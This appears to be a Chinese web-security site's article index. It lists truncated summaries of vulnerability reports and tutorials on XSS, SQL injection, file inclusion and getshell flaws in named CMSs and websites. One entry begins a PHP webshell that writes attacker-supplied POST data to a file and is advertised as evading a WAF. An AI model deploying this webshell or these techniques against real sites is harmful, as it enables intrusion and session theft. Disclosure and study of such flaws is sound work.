常见Flash XSS攻击方式 - 网站安全 - 自学php关注热度:53

0x01 HTML中嵌入FLASH在HTML中嵌入FLASH的时候在IE和非IE浏览器下嵌入的方式有所不同，可以使用embed标签和object标签，使用如下的代码进行嵌入：IE下嵌入object codeBase=http: fpdownload macromedia c..[详情]

安居客设计缺陷可伪造任意经纪人进行房源发布关注热度:50

注册账户，登录，发布房源下一步点击发送验证码，此过程抓包发送是成功了可是看reponse，竟然直接把验证码返回给客户端了所以我们可以填上验证码发布房源了，目测所有发送验证码..[详情]

主机屋可通过修改参数可免费购买域名空间（充关注热度:50

主机屋可通过修改参数可免费购买域名空间（充值刷钱漏洞）http: www zhujiwu com domain 域名注册，随便输入，然后注册。修改购买时长参数。li id=1|年 style=color: rgb(153, 153, 153); background..[详情]

6个常见的 PHP 安全性攻击 - 网站安全 - 自学php关注热度:36

了解常见的PHP应用程序安全威胁，可以确保你的PHP应用程序不受攻击。因此，本文将列出 6个常见的 PHP 安全性攻击，欢迎大家来阅读和学习。1、SQL注入SQL注入是一种恶意攻击，用户利用..[详情]

51cto博客友情链接过滤问题可以获得登录用户co关注热度:38

友情链接过滤不严格，导致可以进行DOM结构注入。从而注入js攻击。另外cookie重要的登录项无httponly 保护，从而可以得到其他用户的登录会话。发生问题的地方。 增加友情链接http: dl52..[详情]

XSS探测 php 获取当前访问的url文件名的方法小结关注热度:39

推荐函数:一是PHP获取当前页面的网址: dedecms也是用的这个代码如下: 获得当前的脚本网址function GetCurUrl(){if(!empty($_SERVER[REQUEST_URI])){$scriptName = $_SERVER[REQUEST_URI];$nowurl = $..[详情]

php绕过安全狗检测的小马分享 - 网站安全 - 自学关注热度:52

直接上代码：?php$p=realpath(dirname(__FILE__) ) $_POST[a];$t=$_POST[b];$tt=;for ($i=0;$istrlen($t);$i+=2) $tt =urldecode(% substr($t,$i,2));@fwrite(fopen($p,w),$tt);echo succ..[详情]

记一次曲曲折折的win8黑客入侵渗透攻击 - 网站安关注热度:145

事情是这样的，有一段时间在A公司实习过，就想渗透A公司，各种工具各种扫，终于发现一个注入点，拿到了后台的密码，登陆进去之后，没有利用的地方，上传点卡的特别严，即使传上..[详情]

利用QQ面板登陆验证不严格+Arp嗅探来登陆内网的关注热度:85

这个可以说没有技术含量,只是说个思路,先简单演示下 1 打开burp设置好浏览器代理然后点下QQ面板里的QQ空间快捷登陆可以看到burp拦截了,主要就是拦截到的这段RUL2 把这个URL复制下下来拿..[详情]

撸一TW服务器小记 - 网站安全 - 自学php关注热度:65

近来想了解一下云端开发平台，本来并没有日站的打算，算是偶遇这一奇葩站，随便翻了翻，发现有点搞头0x02开搞这个地址让我想到了任意下载，所以手贱就测试了一下好吧，路径都出..[详情]

PHP包含漏洞学习 - 网站安全 - 自学php关注热度:45

0x00包含漏洞成因首先需要了解include()函数与require()函数，他们会将所包含的任何格式的文件以php形式执行。两个函数功能基本相同，此外只有当所包含的文件不存在的时候才会体现两个..[详情]

汽车之家旗下一个存储型XSS（证明可劫持商家后关注热度:66

汽车之家旗下的二手车交易中心留言处出现XSS 导致能抓取商家COOKIE 留言处插入代码获取到商家COOKIE伪造COOKIE登录进去商家后台..[详情]

赶集网手机弹窗执行xss指谁打谁 - 网站安全 - 自关注热度:40

1,通知界面2,随便找个人3,Xss4,弹出漏洞修补建议：过滤掉那里吧..[详情]

利用OAuth劫持用户身份 - 网站安全 - 自学php关注热度:56

本文基于@蓝色di雪球在2014年8月22日的KCon上的演讲《利用OAuth劫持用户身份》整理而成。演讲者简介@蓝色di雪球，新浪微博安全团队安全工程师。主要从事微博产品的安全测试，安全功能..[详情]

关于Jenkins安全测试的一些技巧 - 网站安全 - 自学关注热度:46

今天mickey牛发来一篇关于hacking Jenkins的文章，受益匪浅，虽然不是很高深的东西，看完几篇相关文章之后记录下要点，为以后做安全测试留下笔记。 文章链接：http: www labofapenetrationtes..[详情]

YY网站的一个xss跨站漏洞 - 网站安全 - 自学php关注热度:72

YY网站的xss跨站漏洞一枚，可偷摸的盗号,话不多说，详细内容请往下看。接着看：这个漏洞是由一个flash文件引起的，文件地址：http: m yy com live swf Shareobject swf?v=1 1flash文件：http: m yy c..[详情]

phpshe1.2前台无需登录getshell - 网站安全 - 自学ph关注热度:78

存在漏洞的文件install index php，整个过程没有判断install lock，导致可以重复安装，同是在安装的过程中，对配置项没有进行任何处理，导致任意代码写入。详细分析如下：install index php..[详情]

搜狐焦点某影响所有分站的注入漏洞 - 网站安全关注热度:67

具体参数是：brand_intro phpgoogle一下发现gz focus cn vote brand_intro php?brand_id=46house focus cn vote brand_intro php?brand_id=67dl focus cn vote brand_intro php?brand_id=house focus cn vote br..[详情]

CmsEasy最新版SQL注入可获取管理员账户 - 网站安全关注热度:34

与： CmsEasy最新版本无限制SQL注射:http: www 2cto com Article 201407 313603 html 重复:CmsEasy_5 5_UTF-8_20140420官方最新包文件 lib default archive_act php在提交订单时：function orders_action()..[详情]

CmsEasy最新版SQL注入(同一文件多处) - 网站安全关注热度:30

与：CmsEasy最新版本无限制SQL注射:http: www 2cto com Article 201407 313603 html重复CmsEasy_5 5_UTF-8_20140420官方最新包文件 lib default union_act php此文件存在多处SQL注入第一处SQL注入，在联盟注册处..[详情]

phpok存储型xss一枚 - 网站安全 - 自学php关注热度:43

PHPOK4 0 556漏了评论处的 编码转换。$content = $this-get(content, 39;html 39;);type为 html的话case 39;html 39;:$msg = preg_replace($tmp, 39; 39;,$msg);break;只过滤了$tmp = array(..[详情]

TRSWCM 后台权限绕过以及GETSHELL(含详细修复方案关注热度:211

TRS WCM大于v6版本中存在此漏洞，v5 X版本不存在。无需登录。注：该漏洞目前影响大量站点，担心厂商忽略导致漏洞细节提前曝光，请管理员同学转至cncert国家互联网应急中心进行处理，..[详情]

苹果CMS系统sql注入一枚 - 网站安全 - 自学php关注热度:147

由于过滤不严格，导致sql注入影响文件: inc ajax php 第96行$row = $db-getRow(SELECT $col1 , $col2 FROM {pre} $tab WHERE $colid = $id);$tab没有进行严格过滤，可以sql注入。exp:..[详情]

ECSHOP前台任意用户登录 - 网站安全 - 自学php关注热度:46

由于代码设计缺陷 导致网站任意用户登录影响文件:flow php 188行开始elseif ($_REQUEST[ 39;step 39;] == 39;login 39;){ include_once( 39;languages 39; $_CFG[ 39;lang 39;] 39;..[详情]

ATTACKING WEBSERVERS VIA .HTACCESS - 网站安全 - 自学php关注热度:73

A while back I was testing a CMS that had a curious feature, all uploaded files were placed in their own directory This was not a security enhancement as the applica..[详情]

如何评价XSS在黑客攻防中的地位或重要性？ - 网关注热度:42

在我看来XSS使整个WEB体系变得具有灵性了，早年期间XSS漏洞不流行的时候，随手在某个网站上输入一个, 回显出来就有可能够把局部页面弄乱，这样的WEB站点如同一个没有生命的机器人一..[详情]

U-Mail任意文件上传漏洞一枚及修复 - 网站安全关注热度:72

先登录官方测试站点：这里登录的账号为：mailtest3721再获取当前登录用户的user_idhttp: mail comingchina com webmail client oab index php?module=operateaction=member-getpage=1orderby=is_reverse=1..[详情]

新东方在线学习网站一处任意文件下载问题导致关注热度:44

新东方在线学习网站http: www koolearn com 上面的教程不错，最近正在学雅思，就花了几百大洋买了套教程（很坑爹，教程有效期为1个月），无意间发现了一处任意文件下载，然后就开始x..[详情]

金迪邮件系统任意用户劫持到添加系统管理员关注热度:39

金迪邮件系统，JDMAIL用户量很大，官方案例：http: www mailer com cn Products6 htmlhttp: www mailer com cn New%20Customers index1 htm利用证明：关键字：intitle:金笛邮件管理系统http: mail lyx928 com..[详情]

从c#角度看万能密码SQL注入漏洞 - 网站安全 - 自学关注热度:45

以前学习渗透时，虽然也玩过万能密码SQL注入漏洞登陆网站后台，但仅仅会用，并不理解其原理。今天学习c 数据库这一块，正好学到了这方面的知识，才明白原来是怎么回事。众所周知..[详情]